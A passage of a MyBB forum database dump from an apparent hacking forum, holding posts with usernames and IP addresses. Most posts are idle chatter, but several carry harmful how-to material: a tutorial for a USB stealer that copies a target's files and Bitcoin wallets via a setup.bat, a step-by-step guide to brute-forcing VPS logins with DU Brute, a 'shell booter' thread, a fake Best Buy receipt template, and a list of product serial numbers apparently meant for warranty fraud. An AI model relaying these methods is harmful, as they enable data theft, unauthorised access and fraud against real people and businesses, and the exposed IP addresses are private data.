MistaCode.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a7fd2bbce5b2bf0e195962ffdcd75ee7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2170', '457', '2149', '29', 'RE: Get free Alienware Laptops [Secret Loophole of Dell Revealed](Limited Edition)', '0', '82', 'iTzIpod', '1347825558', 'Link is broken. Try uploading it to depositfiles, localhostr, mediafire, rapidshare, etc.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3df8f707edd04f7781a9db095d153e07', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2171', '461', '0', '43', 'some PID\'s List', '0', '62', 'R?????zo?', '1347825758', 'PID\'s List [quote]Microsoft Arc Keyboard P/N: J5D-00001 S/N: 0204400224952 EC 0204400251135 EC 0204400320975 EC 0204400224950 EC 0204400310636 EC Microsoft Sidewinder X6 Keyboard PID: 00905-137-3443232-61938 571545228751301000 Microsoft Comfort Curve Keyboard 2000 PID: 76914-185-5603133-14335 Razer Arctosa Gaming Keyboard Product Code/Model #: RZ03-00260100 Serial: MT1003026H01379 Saitek Eclipse II Backlit Keyboard Product Code/Model #: PK02AU Serial: 7G15306611B Microsoft Arc Mouse P/N: RVF-00001 PID: 00514-545-3653004-21049 PN: X817620-002 S/N: PM1047035101191 Razer Mamba Gaming Mouse P/N: RZ01-00120100-R3U1 S/N: Gaming Mouse : PM1041012100913 Charging Dock : PM1041D12100913 Madcatz Infinity Ward Wired Sniper Mouse M/N: 44300 S/N: FO73400415 Logitech Corded M500 Mouse M/N: M-U0007 P/N: 810-001176 PID: LZ041A3 Logitech Corded LS1 Mouse M/N: M-UAS144 P/N: 810-000622 PID: LZ938AJ Logitech Wireless M215 Mouse M/N: M-R0013 P/N: 810-001550 PID: LZ006AW Razer Imperator Gaming Mouse Product Number : Rz01-00350100-R3u1 Serial Number : PM1047035101191 Logitech MX Revolution Wireless Mouse M/N: M-RBQ124 P/N: 831869-0000 PID: LZ638A9 Explorer Mini Mouse PID: 00516-545-0476765-00145 Sidewinder x8 PID: 00903-163-4444946-74171 Arc Touch Mouse PIDs: 00514-545-0770350-03565 00514-545-1695089-03496 00514-545-1239104-03840 00514-545-1573981-03808 00514-545-0681890-03793 00514-545-1572489-03928 00514-545-1351204-03497 00514-545-1926830-03920 00514-545-0471539-03507 00514-545-0326292-03144 03020-523-0609733-01045 World of Warcraft SteelSeries Cataclysm MMO Gaming Mouse Product Code/Model #: 62100 Serial: 6210000111291027574 Microsoft LifeCam Cinema HD P/N: H5D-00001 PID: 02045-545-1754434-00941 PN: X821404-001 Microsoft LifeCam VX-3000 PID: 78038-171-8422822-97199 Microsoft LifeCam VX-6000 PID: 78040-781-6325174-25233 Microsoft LifeChat LX-3000 PID: 79108-237-3434025-55476 Playstation Eye S/N: 990004612 Logitech USB QuickCam Communicate Webcam PID: LZ510A54667 M/N: V-UAM14A P/N: 861194-0000 Microsoft Presenter 3000 PID: 78041-517-4315323-61888 Toshiba 160GB HDD HP Spare Code: 442171-001 P/N: 440640-001 Xbox 360 Controller PID: 05880-545-1514247-01506 PS3 Dualshock 3 Controller (Not sure if this works!) M/N: CECHZC2U S/N: 0K40090101270 Logitech Wireless S510 Desktop Set P/N: 920-000885 M/N: Y-RAK73 PID: LZ7386mc Type: Keyboard/Mouse Kensington Ci70 Keyboard Mouse COMBO Product Number : K64392US Serial Numbers : A0730A000071 A0915A000100 Microsoft Wireless Laser Desktop 7000 PID: 92463-556-5333966-23786 Microsoft Wireless Entertainment Desktop 7000 PID: 81616-313-1446283-25255 Microsoft Wireless Entertainment Destop 8000 PID: 81615-825-6340215-11984 Microsoft Wireless Laser Desktop 6000 v2.0 PID: 77967-638-2335413-14267 SPEAKERS: Logitech LS11 Speakers PID: CP047 Logitech Speaker System Z323 PID: SN012 Logitech Rechargeable Speaker S715i PID: GG046 Logitech Z323 P/n: 980-000354 M/n: s-00075a PID: sn043 Logitech LS21 PID- SN012 M/n- S-00040 P/n- 880-000117.[/quote]', '94.132.244.168', '1585771688', '1', '0', '62', '1347825781', '1', '603a33721133700f13243287dd47857c', '0', '1347825781'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2172', '457', '2149', '29', 'RE: Get free Alienware Laptops [Secret Loophole of Dell Revealed](Limited Edition)', '0', '61', 'NXK', '1347831020', 'Yes, The link is still broken, Try a different host like media fire, And just password it.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'a372e6c1f0cdb25b19c5f98fdb9680be', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2173', '457', '2172', '29', 'RE: Get free Alienware Laptops [Secret Loophole of Dell Revealed](Limited Edition)', '0', '82', 'iTzIpod', '1347839019', '[quote=\'NXK\' pid=\'2172\' dateline=\'1347831020\'] Yes, The link is still broken, Try a different host like media fire, And just password it. [/quote] Suggested password: l33thacking.net Just in case someone leeches it or leaks it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0afb57a6681933d62c4c32f7a9848c70', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2174', '431', '1957', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '112', '??????Z', '1347839122', 'Lol ipod. Size: about the same size as yours Reloadzor Colour Scheme: silver, grey Render/Image: you choose, im not very creative :) Text: ??????Z Signature + avatar please buddy :) Cheers pal', '92.23.230.99', '1545070179', '1', '0', '112', '1347880570', '1', '8a04cbd7445c06b3b588d2686110b8d1', '0', '1347880570'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2175', '428', '1942', '74', 'RE: Dark Steam | Free Steam Games', '0', '112', '??????Z', '1347840936', 'been a premium member with them about a year. 1: no you cannot play on normal servers or online, you must play on cracked servers for any online games. 2: if you like darksteam then it is really worth paying for a premium account because normal accounts have little amount of games you can dl. i only use it for single player games or games that i want to play just the missions of. i only ever pay for games if i want to play the multiplayer part of the game. got any questions about it then you can pm me here or fine me on the darksteam website with the same username as here.', '92.23.230.99', '1545070179', '1', '0', '0', '0', '1', 'e037f1c811407c1daeafa6b53e97b052', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2176', '431', '2174', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '82', 'iTzIpod', '1347845009', '[quote=\'??????Z\' pid=\'2174\' dateline=\'1347839122\'] Lol ipod. Size: about the same size as yours Reloadzor Colour Scheme: silver, grey Render/Image: you choose, im not very creative :) Text: ??????Z Cheers pal [/quote] Wait. You didn\'t state what you wanted. Avatar Signature/Tag Banner Etc?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'feee71035880183aa3634e808ea5130a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2177', '428', '2175', '74', 'RE: Dark Steam | Free Steam Games', '0', '82', 'iTzIpod', '1347845084', '[quote=\'??????Z\' pid=\'2175\' dateline=\'1347840936\'] been a premium member with them about a year. 1: no you cannot play on normal servers or online, you must play on cracked servers for any online games. 2: if you like darksteam then it is really worth paying for a premium account because normal accounts have little amount of games you can dl. i only use it for single player games or games that i want to play just the missions of. i only ever pay for games if i want to play the multiplayer part of the game. got any questions about it then you can pm me here or fine me on the darksteam website with the same username as here. [/quote] Thanks for sharing your experience with Unique.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bdf6175fe5edcd585abf7aadc7427966', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2178', '437', '1995', '3', 'RE: Help keep LH up', '0', '20', 'JakeUS', '1347846131', 'I\'ll click on the links now.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'a559acdc52572b483925c70f5ba15d5e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2179', '436', '1988', '7', 'RE: Motivation', '0', '20', 'JakeUS', '1347846255', 'I\'m on here everyday. Just not as active because of school.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '387e26472b217166034df243a6fe0931', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2180', '345', '1632', '63', 'RE: Need userbar! [Gamers]', '0', '1', 't3h jok3r', '1347848090', 'So when will NXK pick the new usebar, the like Reloazors latest userbar the most.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd398e40b120f58282f61d714d46c1ffd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2181', '462', '0', '35', 'Vote for LHs new logo', '0', '1', 't3h jok3r', '1347848243', '[b]Number 1[/b] [img]http://i1107.photobucket.com/albums/h400/maxhax195/Attempt-2.png[/img] [b]Number 2[/b] https://www.dropbox.com/s/ok8bzkrx983wl0w/Edit.png [b]Number 3[/b] The current one. If you can make a better one or want to give it a try then post your logos below. Thanks for giving it a try.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '76a869b38bfeb572541c359d48358d2a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2182', '446', '2133', '28', 'RE: This forum is dead..', '0', '1', 't3h jok3r', '1347848401', '[quote=\'Apathy\' pid=\'2133\' dateline=\'1347807770\'] I agree. And technically weren\'t you the first active member joker and me second? [/quote] Uhh **Got caught** No, because we are humans not robots so we can\'t be \"technically\" :cool:', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '40341cfa708728e3ed4b078722a8bf36', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2183', '451', '2125', '19', 'RE: [Recently Created]Free working shell booter', '0', '1', 't3h jok3r', '1347848946', '[quote=\'HoverCatz\' pid=\'2125\' dateline=\'1347797372\'] Explain how i get it to work? [/quote] Lmfao I OD LOL when I downloaded the program to check what\'s wrong with it and after I saw that it was blank I had to laugh at your comment. Checked the file and it\'s clean. Thread will be junked into a few hours.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '417507e785247d0e79c5097753ddab36', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2184', '437', '1995', '3', 'RE: Help keep LH up', '0', '7', 'Romdu62', '1347849519', 'Clicked on them for you. Good Luck', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '129126e26b162fb0e06151671606ce0e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2185', '388', '1781', '52', 'RE: Request for the coders group', '0', '7', 'Romdu62', '1347849550', 'i did but didnt work. can you try?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '54a8a3aa7749fd0472c92216eae4763c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2186', '463', '0', '20', '[VB.NET]Free Encrypters Algothrims Codes AER256 - OKTO3 & MORE...', '0', '7', 'Romdu62', '1347849885', 'Hi Evy1 ;) I\'ts me again i\'m Giving Some Encrypting alghotrims codes For Use On [u]VB.NET[/u] here are the list : [list][b] [*]AER256 [*]ARMON64 [*]ATOM128 [*]BASE64 [*]ESBA [*]eZIP64 [*]FERON74 [*]GILA7 [*]HAZZ15 [*]MEGAN35 [*]OKTO3 [*]TIGO3FX [*]TRIPO5 [*]ZARA128 [*]ZONG22[/b] [/list] [color=#FF0000][u]Screenshot:[/u][/color] [spoiler][img]http://img844.imageshack.us/img844/6605/69b186e2124640cf9fc2a1a.png[/img][/spoiler] [color=#FF0000][u]Download : [/u][/color] [url=http://fileshub.in/download.php?file=264Encrypters.rar]Click Here To download[/url] Credits: Sidodz', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '50549bdf8512d9e24f122fd17c7d6fd7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2187', '431', '1957', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '2', 'Apathy', '1347849987', 'Second last from bottom.', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', 'a8a9fa48c060f2311e4603fa28e1c32f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2188', '443', '2155', '42', 'RE: Apple Announces the iPhone 5', '0', '7', 'Romdu62', '1347849996', '[quote=\'MistaCode\' pid=\'2155\' dateline=\'1347816171\'] [quote=\'iTzIpod\' pid=\'2101\' dateline=\'1347743858\'] I know right? That\'s really expensive... [/quote] 200$ for iPhone? That\'s called Cheap for iPhone. As iPhone 4S was 500$, and that\'s called expensive. [/quote] Welcome back mistacode lol. I find $200 for an iphone cheap to.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '1318db48433d81935041f21e8e4365cd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2368', '465', '2194', '11', 'RE: What is ewhoring', '0', '82', 'iTzIpod', '1348107034', 'All of the E-Whoring details can be found [url=http://l33thacking.net/thread-26.html] here[/url]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '710fc334a3e6d97a18723e4298a6d984', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2190', '435', '1984', '4', 'RE: Newbie Here', '0', '188', 'Lonnie', '1347851162', 'Thank you guys for the welcoming!', '24.0.108.10', '402680842', '0', '0', '0', '0', '1', '64b7a09970d3df114348a7e156aa0cf3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2191', '345', '1632', '63', 'RE: Need userbar! [Gamers]', '0', '61', 'NXK', '1347851351', 'When I find something I like, I still feel like it\'s plain. Like don\'t get me wrong it\'s amazing it\'s just not something i\'m looking for.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'ad58f70478e98b8980ba4b8ef4777858', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2192', '464', '0', '12', '[TUT] FUD USB Stealer by Anonymous Hackers', '0', '10', 'swa4567', '1347851698', 'Here is a simple method to grab all the data on a targets computer if you have access to it, by simply plugging in a USB disc. This will allow you to grab: -All Data -Pictures/ Videos -Documents -Bitcoin -Etc. So lets get started! [color=#1E90FF]1.[/color] [color=#32CD32][b][u]Download file from this link.[/u][/b][/color] http://nightarrowforensics.com/ [color=#FF0000][u][b]Virus Scan:[/b][/u][/color] http://vscan.novirusthanks.org/analysis/ab780ca63da72a8482ad40299a4fe083/bmlnaHRhcnJvdzItMC16aXA=/ http://www.metascan-online.com/results/hu51m9ea9rsyprd4la8c9ddcek2urnl1 [color=#FFD700] [b]Select the download tab on the top area of the page.[/b][/color] [IMG]http://i46.tinypic.com/20nrid.jpg[/IMG] [color=#FFD700] [b]Select the first choice for download \"Current Version.\"[/b][/color] [IMG]http://i47.tinypic.com/34fcsas.png[/IMG] [color=#FFD700] [b][color=#1E90FF]2.[/color] Once downloaded open using Winzip and take the setup.bat file and simply drag and drop it to the desired USB drive you want to use. [/b][/color] [IMG]http://i49.tinypic.com/wttw2d.png[/IMG] [IMG]http://i47.tinypic.com/50668h.png[/IMG] [color=#FFD700][b][color=#1E90FF]3.[/color] Remove the USB drive and insert it in the targets computer and run the setup.bat file and that\'s it. Below is Proof/Example.[/b][/color] [IMG]http://i50.tinypic.com/25aj43q.png[/IMG] [color=#FFD700][b]This is how all the Data will look & be stored once completed.[/b][/color] [IMG]http://i47.tinypic.com/317cvas.png[/IMG] Made By: [color=#1E90FF]TheAnonLegion99[/color] [b]We Are Anonymous We Are Legion We Do Not Forgive We Do not Forget Expect Us[/b]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '323fdd6991dfdc8adf4981c067b16ec7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2193', '51', '133', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '10', 'swa4567', '1347851802', 'Wow i didn\'t no that. Thanks for telling us', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '6c4751f91e9dd62c48d665248efab057', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2194', '465', '0', '11', 'What is ewhoring', '0', '10', 'swa4567', '1347851832', 'What is ewhoring. I don\'t get it is it porn?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '4ce5f0ec0bad35f365be6b11f958933b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2195', '449', '2122', '35', 'RE: Kratos God Of War Signature/Tag', '0', '82', 'iTzIpod', '1347851857', '[quote=\'R?????zo?\' pid=\'2122\' dateline=\'1347795298\'] Looks awesome, did you made it yourself? I would rate 9/10, would look perfect with a fading border. [/quote] Yeah. I made it myself. I might add a fading border. But how do I do that? Do I add a border and lower the opacity or something?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9035217e60f71b19e3517acb9edd05ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2196', '403', '1883', '18', 'RE: Youtube Bot', '0', '10', 'swa4567', '1347851956', 'Can you post a screenshot please', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'f0a803d9e8faedb2aff0fe9edcf2ede7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2197', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '10', 'swa4567', '1347851990', 'What are the requirements?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '7db745761739905cdd4beea762b8be87', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2198', '462', '2181', '35', 'RE: Vote for LHs new logo', '0', '82', 'iTzIpod', '1347852424', ':/ I can\'t view the 2nd one since I\'m on Mobile. But for now, my vote goes to the 1st logo. I would like to see Reloadzor try out for this though! :D Good luck everyone.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f767f2ba1d4a75e8929340629127b5b1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2284', '451', '2111', '19', '[Junk][Recently Created]Free working shell booter', '0', '1', 't3h jok3r', '1347936326', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2285', '388', '1781', '52', 'RE: Request for the coders group', '0', '7', 'Romdu62', '1347936396', 'ok can you tell me how to use this program properly?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'a01d7a9eb80f7f43e15a6e8e57662ba1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2286', '470', '2211', '14', 'RE: [SHITLOAD][FRESH]Free proxy list', '0', '7', 'Romdu62', '1347936482', 'thanks for the list but too long.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'd39d90566736adf9cbc760a0159b3291', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2200', '438', '2012', '13', 'RE: Stay Anonymous (Secure) online 2012 Using SSH Tunneling', '0', '5', 'Timmy', '1347852970', 'I heard a lot TOR browser. Is it really that good?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '20380918fd700c1976fa5acfed1eb6f7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2201', '466', '0', '13', 'How to BruteForce a VPS!', '0', '5', 'Timmy', '1347853035', '[align=center][color=#32CD32][size=large] How to BruteForce a VPS! [/align] [/size][/color] [size=medium] [color=#FF4500] [size=xx-large] 1) [/size] [/color]Alright first off your going to need to download DU Brute, And VNC Scanner. Link: [/size] [url=http://www.mediafire.com/?5kfe8qg0s7qazsl]CLICK ME![/url] [size=medium] [color=#FF4500] [size=xx-large] 2) [/size] [/color] After you have those downloaded your going to have to go into the VNC Scanner folder and open \"vnc_scanner_gui.exe\" Its the one all the way at the bottom. Once you have that opened it should look like this [img]http://i.imgur.com/DmjVP.png[/img] [color=#FF4500] [size=xx-large] 3) [/size] [/color]Now your going to need to go to get some proxies. After you have some, just copy the proxies and paste them in the VNC Scanner. Then press \"Start Scan\" [img]http://i.imgur.com/eJjha.png[/img] [color=#FF4500] [size=xx-large] 4) [/size] [/color] Once you have clicked \"Start Scan\" a cmd window will come up and just let it do its thing. After its done you should see the \"Start Scan\" Button fading in and out. When you see it fading in and out, You have to press \"Save List\" and save it to desktop. [color=#FF4500] [size=xx-large] 4) [/size] [/color] Now open the DU Brute folder and open DU Brute.exe. Once you have opened it click \"Generation\" [img]http://i.imgur.com/uAwaV.png[/img] [color=#FF4500] [size=xx-large] 5) [/size] [/color] Once you have clicked Generation, click \"File IP\" and pick the IP list you saved to your desktop. Then click on \"File Login\" and go to the DUBrute folder and click on \"usernames\" Now after you have that done go to \"File Pass\" and open the \"Passwords\" Folder that is in the DUBrute folder, And pick one of the password lists. [img]http://i.imgur.com/4fk6P.png[/img] [color=#FF4500] [size=xx-large] 6) [/size] [/color] After you have done that, Press \"Make\" and then it should be finished pretty fast then press \"Ok\" in the new windows that pops up. Now just exit out of \"Generation\" and press \"start\" on DU Brute. [img]http://i.imgur.com/4fk6P.png[/img] [color=#FF4500] [size=xx-large] 7) [/size] [/color] [/size] [size=medium] Then this is the long part, You just need to wait for it to do its thing. This may take a shitwhile but at the end you could have a list of VPS logins.[/size] Credits: [url=http://l33thacking.net/user-214.html]Kasual[/url]', '72.231.24.165', '1223104677', '1', '0', '5', '1349233240', '1', 'a060a78da65b24ac921ac1d985983bab', '0', '1349233240'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2202', '345', '2191', '63', 'RE: Need userbar! [Gamers]', '0', '5', 'Timmy', '1347853148', '[quote=\'NXK\' pid=\'2191\' dateline=\'1347851351\'] When I find something I like, I still feel like it\'s plain. Like don\'t get me wrong it\'s amazing it\'s just not something i\'m looking for. [/quote] To be honest, you won\'t get any professional work done with like 2 novice GFX experts on a new forum unless you get paid work from outside of LH.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1dcbbbfdee6d96d15ab94b0685807ef0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2203', '467', '0', '44', 'Bestbuy PSD', '0', '5', 'Timmy', '1347853327', 'Free BestBuy Receipt Photoshop Draft copy. Download: http://www.mediafire.com/?coxye46s35ud9y6', 